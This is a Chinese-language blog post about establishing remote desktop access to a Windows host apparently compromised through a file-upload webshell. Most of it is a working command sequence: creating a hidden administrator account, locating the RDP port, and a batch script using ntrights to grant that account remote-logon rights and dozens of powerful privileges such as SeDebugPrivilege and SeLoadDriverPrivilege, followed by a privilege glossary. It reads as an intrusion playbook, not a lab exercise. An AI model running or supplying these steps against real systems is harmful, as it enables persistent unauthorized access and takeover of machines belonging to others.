记一次远程桌面连接

4月 2, 2021 38点热度 1人点赞 0条评论
起初是这样的,我们通过文件上传拿到一个webshell。添加用户
net user test test123!@# /add net localgroup administrators test /add

查询RDP端口

方法一

REG query HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server\WinStations\RDP-Tcp /v PortNumber

十六进制转为10进制即可

方法二

tasklist /svc | find "Ter"(查找远程连接的PID) 
netstat -ano | find "1352"(通过PID值查找开放的端口)

尝试进行远程连接,嗯报错了...

莫西莫西,百度一番,

ntrights为命令行下的组策略管理命令。
ntrights.exe
用法:-u xxx xxx为用户/组
-m \\xxx 对远程主机进行操作(默认本地机器)
-e xxxxx 添加xxxxx到事件日志
-r xxx 删除xxx权限
+r xxx 添加xxx权限

解决办法:

ntrights -u test -r SeDenyInteractiveLogonRight
::去掉guest "拒绝本地登录" 权限
Ntrights -u test +r SeInteractiveLogonRight
::加上guest "允许本地登录" 权限
Ntrights -u test -r SeDenyNetworkLogonRight
::去掉guest "拒绝网络登录" 权限
Ntrights -u testt +r SeNetworkLogonRight
::加上guest "允许网络登录" 权限
Ntrights -u test +r SeRemoteInteractiveLogonRight

其实有时候只要最后一条就可以了。修改完成后,此错误消失了,但又产生了新的错误。

mmp,心想这不完蛋了,百度也搜不到方法。 :cry:
最终我导出了所有的组策略,查看一番。
导出组策略
secedit /export /cfg 1.inf
下载1.inf即可。
解决办法:
把当前用的组策略改为和管理员一样
bat脚本
ntrights -u guest -r SeDenyInteractiveLogonRight
Ntrights -u guest +r SeInteractiveLogonRight
Ntrights -u guest -r SeDenyNetworkLogonRight
Ntrights -u guest +r SeNetworkLogonRight
Ntrights -u guest +r SeRemoteInteractiveLogonRight
Ntrights -u test +r SeBackupPrivilege
Ntrights -u test +r SeChangeNotifyPrivilege
Ntrights -u test +r SeSystemtimePrivilege
Ntrights -u test +r SeDebugPrivilege
Ntrights -u test +r SeRemoteShutdownPrivilege
Ntrights -u test +r SeIncreaseQuotaPrivilege
Ntrights -u test +r SeIncreaseBasePriorityPrivilege
Ntrights -u test +r SeLoadDriverPrivilege
Ntrights -u test +r SeBatchLogonRight
Ntrights -u test +r SeSecurityPrivilege
Ntrights -u test +r SeSystemEnvironmentPrivilege
Ntrights -u test +r SeProfileSingleProcessPrivilege
Ntrights -u test +r SeSystemProfilePrivilege
Ntrights -u test +r SeAssignPrimaryTokenPrivilege
Ntrights -u test +r SeRestorePrivilege
Ntrights -u test +r SeShutdownPrivilege
Ntrights -u test +r SeTakeOwnershipPrivilege
Ntrights -u test +r SeUndockPrivilege
Ntrights -u test +r SeManageVolumePrivilege
Ntrights -u test +r SeRemoteInteractiveLogonRight
Ntrights -u test +r SeCreateGlobalPrivilege
Ntrights -u test +r SeTimeZonePrivilege
Ntrights -u test +r SeCreateSymbolicLinkPrivilege
Ntrights -u test +r SeDelegateSessionUserImpersonatePrivilege
Ntrights -u test +r SeRemoteInteractiveLogonRight

组策略对应说明 :lol:

用户权限
说明
SeCreateTokenPrivilege
创建记号对象
SeAssignPrimaryTokenPrivilege
替换进程级记号
SeLockMemoryPrivilege
内存中锁定页
SeIncreaseQuotaPrivilege
调整进程的内存配额
SeUnsolicitedInputPrivilege
不请自来的输入权限(不知此权限与用户权利指派中哪项对应)
SeMachineAccountPrivilege
域中添加工作站
SeTcbPrivilege
以操作系统方式操作
SeSecurityPrivilege
管理审核和安全日志
SeTakeOwnershipPrivilege
取得文件或其他对象的所有权
SeLoadDriverPrivilege
加载和卸载设备驱动程序
SeSystemProfilePrivilege
配置系统性能
SeSystemTimePrivilege
更改系统时间
SeProfileSingleProcessPrivilege
配置单一进程
SeIncreaseBasePriorityPrivilege
增加进度优先级
SeCreatePagefilePrivilege
创建页面文件
SeCreatePermanentPrivilege
创建永久共享对象
SeBackupPrivilege
备份文件和目录
SeRestorePrivilege
还原文件和目录
SeShutdownPrivilege
关闭系统
SeAuditPrivilege
产生安全审核
SeSystemEnvironmentPrivilege
修改系统(固件)环境值
SeChangeNotifyPrivilege
跳过遍历检查

qianxiao996

这个人很懒,什么都没留下

文章评论